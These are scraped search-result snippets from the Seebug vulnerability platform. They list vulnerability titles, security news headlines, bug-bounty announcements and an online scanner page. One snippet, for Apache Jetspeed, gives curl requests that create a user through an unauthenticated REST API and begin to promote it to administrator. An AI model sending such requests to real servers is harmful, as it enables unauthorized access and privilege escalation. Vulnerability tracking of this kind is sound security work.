seebug.org
Vulnerability List - Knownsec Seebug Vulnerability Platform
https://www.seebug.org/vuldb/vulnerabilities
Linux kernel local privilege escalation flaw in n hdlc CVE-2017-2636. Cross Site Scripting injection vulnerability in SANADATA SanaCMS 7.3. WordPress audio playlist functionality is affected by Cross-Site Scripting. NETGEAR DGN2200 Remote Command Execution. Larice Club readnews.php 参数id SQL注入漏洞. VMPanel cybervm 登录处 参数username 反射型XSS漏洞. Component Spinner 360 v1.3.0 - SQL Injection. The Wireless IP Camera (P2P) WIFICAM Multiple vulnerabilities. Component JO Facebook Gallery v4.5 - SQL Injection.
seebug.org
漏洞精选第一期 - Vulnerability Topic - Knownsec Seebug Vulnerability Platform
https://www.seebug.org/vuldb/topics/1
这是 Seebug 精选漏洞第一期,主要包含一些硬件设备以及工控类型漏洞,这些漏洞均为一些重要漏洞,并且均包含有基于Pocsuite 编写的PoC. 网康 NS-ASG 6.2 用安全网关 /debug/rproxy diag.php 任意文件下载. 网康安全网关(Netentsec ASG) 6.3 /debug/rproxy diag.php 任意文件下载漏洞. NS-ASG 应用安全网关 resetpwd.php等10处 SQL注入漏洞. 网康 NS-ASG 应用安全网关 6.2 6.3 vpnweb/resetpwd/resetpwd.php 等文件 SQL注入漏洞. Netentsec ASG 网康应用安全网关 resetpwd.php SQL注入. Wago wago TO-PASS 弱口令漏洞. Digi Portserver TS 1弱口令. ZTE OLT C200 telnet 弱口令. Huawei VRP telnet 弱口令. 天融信Top App 网关应用bytecache run action.php 命令执行. Stulz GmbH Stulz WIB 8000 弱口令.
seebug.org
漏洞精选第二期--浏览器专题 - Vulnerability Topic - Knownsec Seebug Vulnerability Platform
https://www.seebug.org/vuldb/topics/2
百度浏览器海外版 Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS). Multiple Browsers Audio Tag DoS Vulnerability. Opera Web Browser 8.0/8.5 HTML Form Status Bar Misrepresentation Vulnerability. Qtweb Browser 3.5 - Buffer Overflow Vulnerability. Amaya Web Browser = 11.0.1 - Remote Buffer Overflow Exploit (vista). Opera Web Browser 10.01 dtoa() Remote Code Execution Vulnerability. Opera Web Browser 9.x History Search and Links Panel Cross Site Scripting Vulnerabilities. Opera Web Browser 9...
seebug.org
Detail Reward List - Knownsec Seebug Vulnerability Platform
https://www.seebug.org/vuldb/reward/detail
Symantec Endpoint Protection Manager-RU6-MP3任意操作系统命令执行漏洞. Joomla Ja-Ka-Filter-And-Search 组件 SQL 注入漏洞. PLANET VDR-300NU ADSL Router - 未授权修改DNS. Tenda ADSL2/2 Modem 963281TAN - 未授权修改DNS. Cisco ASA / PIX - Privilege Escalation (EPICBANANA). Hikvision Digital Video Recorder CSRF 漏洞. Schneider Electric PowerLogic Series 800 Power Meter 弱口令. Cisco Prime Network Services Controller任意命令执行漏洞. Linux kernel drivers/usb/serial/whiteheat.c 拒绝服务漏洞. Huawei Enterprise Information Engine SQL注入漏洞.
seebug.org
黑客入侵富帝银行系统、敲诈“知名人士”10% 存款否则曝光账户信息- Vulnerability broadcast - Knownsec Seebug Vulnerability Platform
https://www.seebug.org/vuldb/news/1835
黑客入侵富帝银行系统、敲诈 知名人士 10% 存款否则曝光账户信息. 当地时间 11 月 25 日,黑客向富帝银行的 知名人士 发送了一封 勒索邮件。 邮件内容表示黑客入侵了富帝银行 列支敦士登分行 的系统,获得了受害人账户的细节信息,受害人需通过比特币帐户向黑客转账自己 10 的银行存款。 Read the original text. Source: http:/ hackernews.cc/. 15th Floor, Unit A, Tower 3, Wangjing SOHO, Fu'an West Road, Chaoyang District, Beijing 100102, P.R.China. Please call the customer service hotline to recharge, thank you for your continued support Seebug!
seebug.org
Announcement - Knownsec Seebug Vulnerability Platform
https://www.seebug.org/help/announcement/14
Beebeeto 并入 Sebug,Sebug 升级品牌为 Seebug. 纵观 Seebug 原有的 Sebug 的 Se 取自 Search 的意思,Sebug 更多的是一个漏洞库,提供漏洞的检索,而改用 Seebug ,除了因为合并了 Beebeeto 之外,See 为洞悉、看见、发现、关注的意思,Seebug,洞悉漏洞,让你掌握第一手漏洞情报 不止是原来的检索漏洞,更是一个漏洞社区,Seebug 漏洞社区承载的不再只是漏洞库这一概念,除了海量的漏洞数据,还是一个开放 PoC/Exp 的提交、共享与兑换平台,不再只是索引漏洞,而是洞悉漏洞,构建有生命力的漏洞,提供漏洞情报 Seebug 在2015年8月22日正式公测后,到目前为止已经通过现金奖励等方式累计给白帽子发出近80万的人民币 当然,不会只剩下20万的悬赏,当一百万补贴完后我们将投入第二期的百万奖金以及后续更多 ,缘于白帽子们的参与,白帽子们通过提交 PoC/Exp、漏洞详情等为社区贡献,同时也给自己收获现金的奖励,感谢我们的白帽子们对社区的贡献。 推荐大家使用 Pocsuite https:/ github.com/knownse...
seebug.org
Vulnerability Scan Online -Knownsec Seebug Vulnerability Platform
https://www.seebug.org/monster
Seebug Vulnerability Scan Online. Struts 2 远程命令执行漏洞 S2-045. More details of the vulnerability and repair program, please refer to: www.seebug.org/vuldb/ssvid-92746. The line detection for detecting whether there is a correspondence own server vulnerabilities, aimed at helping maintenance staff or owners find problems, please observe the relevant laws and regulations, not for illegal purposes! Struts 2 远程命令执行漏洞 S2-045. WordPress REST API 内容注入漏洞. WordPress functions.php 主题文件后门漏洞. JBoss Java 反序列化 过程远程命令执行漏洞.
seebug.org
Apache Jetspeed 用户管理 REST API 未授权访问漏洞 - Knownsec Seebug Vulnerability Platform
https://www.seebug.org/vuldb/ssvid-90922
Apache Jetspeed 用户管理 REST API 未授权访问漏洞. Jetspeed 2.3.0). 漏洞效果 # # 用户管理 REST API 未授权 构造用户管理 REST API 创建用户 foobar: ` ` curl -i http:/ 192.168.199.152:8080/jetspeed/services/usermanager/users/? Type=json&name=foobar&password=password&password confirm=password&user name given=foo&user name family=bar&user email=foo@bar.net&newrule= -X POST ` ` 构造用户管理 REST API 提升用户 foobar 为管理员: ` ` curl -i http:/ 192.168.199.152:8080/jetspeed/services/usermanager/users/foobar/? Apache Jetspeed 用户管理 REST API 未授权访问漏洞. 15th Floor...
seebug.org
Vulnerability broadcast - 2017-03-09 - Knownsec Seebug Vulnerability Platform
https://www.seebug.org/vuldb/news
勒索软件 Cerber 更迭至 5.0.1 使用新 IP 地址范围. 黑客入侵富帝银行系统、敲诈 知名人士 10% 存款否则曝光账户信息. 美国海军数据泄露,涉 13.4 万士兵个人信息. 为查儿童色情网站,FBI 以恶意软件黑遍全球 120 国. 黑客组织 Shad0wS3C 入侵墨西哥政府 IFREM 网站、泄露主数据库文件. 谷歌向众记者、诺贝尔奖学者发送警告 你已被 国家级 黑客盯上. 商业邮件诈骗将目标转向医疗机构 ,英美及加拿大 35 家机构沦陷. 欧洲刑警组织开展 钱骡行动 打击网络金融犯罪、逮捕 178 人. WordPress 自动更新服务器存漏洞,全球 27% 网站可被恶意更新. Apple 严重 Bug 恶意视频链接可导致任意 iOS 设备死机. 亚欧 14 国大批 ATM 取款机遭黑客攻击,自动向外狂吐现金. 小心欺诈 此 ɢoogle.com 非彼 Google.com. Please call the customer service hotline to recharge, thank you for your continued support Seebug!
seebug.org
Reward task list - Knownsec Seebug Vulnerability Platform
https://www.seebug.org/contribute/reward/tasks
Seebug 针对工控相关漏洞进行悬赏,只要是与工控相关的设备软硬件漏洞均可,针对该类型漏洞 PoC,Seebug 将按照审核标准进行审核,进行翻倍 至少2倍 奖励。 如果提交漏洞的设备不在可选列表,可以联系我们添加 QQ群283800159,或者直接选择ICS组件 ,工控相关漏洞可以参考 https:/ ics-cert.us-cert.gov/advisories-by-vendor. 15th Floor, Unit A, Tower 3, Wangjing SOHO, Fu'an West Road, Chaoyang District, Beijing 100102, P.R.China. Please call the customer service hotline to recharge, thank you for your continued support Seebug!
SOCIAL ENGAGEMENT